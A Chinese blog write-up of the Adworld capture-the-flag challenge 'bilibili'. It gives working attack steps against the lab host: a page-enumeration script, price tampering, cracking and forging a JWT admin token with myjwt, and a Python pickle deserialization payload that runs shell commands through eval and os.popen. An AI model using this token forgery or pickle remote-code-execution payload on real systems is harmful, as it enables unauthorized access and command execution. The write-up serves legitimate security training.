首页 > 其他分享 >攻防世界--bilibili

攻防世界--bilibili

时间:2024-05-28 12:10:51浏览次数:22  
标签:__ 攻防 -- 代码 JWT bilibili import 我们

在我们进入这道题目的时候,可以看出是要求我们去获取lv6

为此我们直接写代码:

点击查看代码
import requests
target = "http://61.147.171.105:50909/shop?page=%d"
for i in range(500):
    res = requests.get(target%(i)).text
    if "lv6.png" in res:
        print(target%(i))
        break

跑出来的结果入下图所示:

我们访问这个页面就可以看到购买lv6的方式,我们会发现我们的资金是完全不够的,直接用bp拦截修改就行:

我们发现这里提示我们访问/b1g_m4mber这个目录


但是这个网站只能用admin权限,我们可以看到这边是有JWT,我们先解密一下:

这里我们需要修改一下这里的username,需要用myjwt工具爆破出盐值secret_key

点击查看代码
myjwt eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InF3ZSJ9.U_RNAhBZvEMY1nwmWWeA3Vh50ghzJb0R7qV-uAS1V78 --crack "[A-Za-z0-9]{4}"
myjwt eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InF3ZSJ9.U_RNAhBZvEMY1nwmWWeA3Vh50ghzJb0R7qV-uAS1V78 --add-payload "username=admin" --sign 1Kun
new JWT: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.40on__HQ8B2-wM1ZSwax3ivRK4j54jlaXv-1JjQynjo
我们这个时候就只需要把JWT复制过去就行

在这里我们可以看到/static/asd1f654e683wq/www.zip这个页面,可以下载这道题的源代码

我们发现Admin.py这个文件里面存在python反序列化漏洞,这里我们直接写脚本获得反序列化的代码(注意,这里需要python2的环境)

点击查看代码
import urllib2
import pickle
class A(object):
    def __reduce__(self):
        # a = "__import__('os').popen('ls').read()"
        # a = "__import__('os').popen('ls').read()"
        a = "__import__('os').popen('cat /flag.txt').read()"
        return (eval,(a,))

print(urllib2.quote(pickle.dumps(A())))


这样我们就成功的获得了flag

标签:__,攻防,--,代码,JWT,bilibili,import,我们
From: https://www.cnblogs.com/ha1stur/p/18216929

相关文章

  • go timer
    Timer的创建Timer是一次性的时间触发事件,这点与Ticker不同,后者则是按一定时间间隔持续触发时间事件。Timer常见的使用场景如下:场景1:t:=time.AfterFunc(d,f)场景2:select{casem:=<-c:handle(m)case<-time.After(5*time.Minute):fmt.Pri......
  • 滚动条插件vue-scroll
    一、介绍vuescroll是一个基于vue.js2.X虚拟滚动条,它支持定制滚动条的样式,检测内容尺寸变化、能够使内容分页、支持上拉-刷新,下推加载等诸多特性二、特点(1)拥有原生滚动条的滚动行为(2)可以定制滚动条的样式(包括颜色、尺寸、位置、透明度、是否保持显示等)(3)在模式之间自......
  • 计算机网络-BGP基础概念
    一、BGP的基本概念BGP是一种实现自治系统AS之间的路由可达,并选择最佳路由的矢量性协议。早期发布的三个版本分别是BGP-1(RFC1105)、BGP-2(RFC1163)和BGP-3(RFC1267),1994年开始使用BGP-4(RFC1771),2006年之后单播IPv4网络使用的版本是BGP-4(RFC4271),其他网络(如IPv6等)使用的版本是MP-BG......
  • 探索XHer:Alienchat最佳替代品
    随着人工智能技术的快速发展,AI聊天软件也愈发被大家所关注。不仅能够帮助我们进行情绪宣泄的出口,也可以在孤独的生活中带来一些色彩。然而,近期Alienchat因种种原因无法继续使用,这使得许多玩家陷入困境。在此背景下,本文将深入探讨AC软件无法使用的原因,以及平替的软件。一、A......
  • 1、sqlserver的临时表
    目录sqlserver的临时表1、本地临时表2、全局临时表3、使用临时表sqlserver的临时表在SQLServer中,临时表可以帮助我们在一个会话(Session)或者一个事务(Transaction)的范围内保存临时数据。它们可以是本地或全局的。1、本地临时表本地临时表的名称以一个井号(#)开始,它仅对当前......
  • AP5152 是一种输出电流可调的、低压差的 LED 恒流驱动器
    AP5152是一种输出电流可调的、低压差的LED恒流驱动器,仅需一个外接电阻和一个NMOS管就可以构成一个完整的LED恒流驱动电路,调节该外接电阻就可以调节输出电流,输出电流可调范围为100mA到3000mA。AP5152内置过热保护功能,可有效保护芯片,避免温度超过120oC时因过热而造成损......
  • 专业神秘顾客暗访:终端渠道明察暗访包括哪些方面?
    终端渠道明察暗访是企业为确保其产品和服务在终端渠道(如零售店、分销商、经销商等)中按预期运营和表现而采取的一种监控方法。该方法包括明察(公开检查)和暗访(秘密检查)两部分,旨在全面了解和改进终端渠道的表现,维护品牌形象和市场竞争力。深圳神秘顾客市场调查限公司(SMS)依据以往经......
  • 2、补0函数
    补0函数1、FORMAT函数SELECTFORMAT(你的数字列,'0000000000');--这里的0的数量应该与你需要的位数相对应2、RIGHT和REPLICATE函数SELECTRIGHT(REPLICATE('0',你想要的数字位数)+CAST(你的数字列ASVARCHAR(MAX)),你想要的数字位数);3、例如,如果你有一个数字1,并且......
  • 纸片人恋爱:虚拟世界的甜蜜浪漫
    引言:纸片人恋爱的新时代当今时代,人们寻求爱情和亲密关系的方式也在不断演变。与传统的相亲、约会相比,现代科技为我们带来了全新的恋爱体验——纸片人,与虚拟角色展开浪漫互动。在这篇文章中,我们将为您介绍纸片人恋爱的起因与沟通方式!也许会有人好奇:为什么会喜欢纸片人?......
  • LED摩托车灯ic降压恒流芯片电动车灯AP2402 半亮/全亮/爆闪
    玩具手电筒LED驱动降压恒流ICAP2402带爆闪教全亮/半亮/爆闪产品描述AP2402是一款PWM工作模式,高效率、外围简单、内置功率管,适用于5-100V输入的高精度降压LED恒流驱动芯片。输出最大功率可达15W,最大电流1.5A。AP2402可实现三段功能切换,通过MODE1/2/3切换三种功能......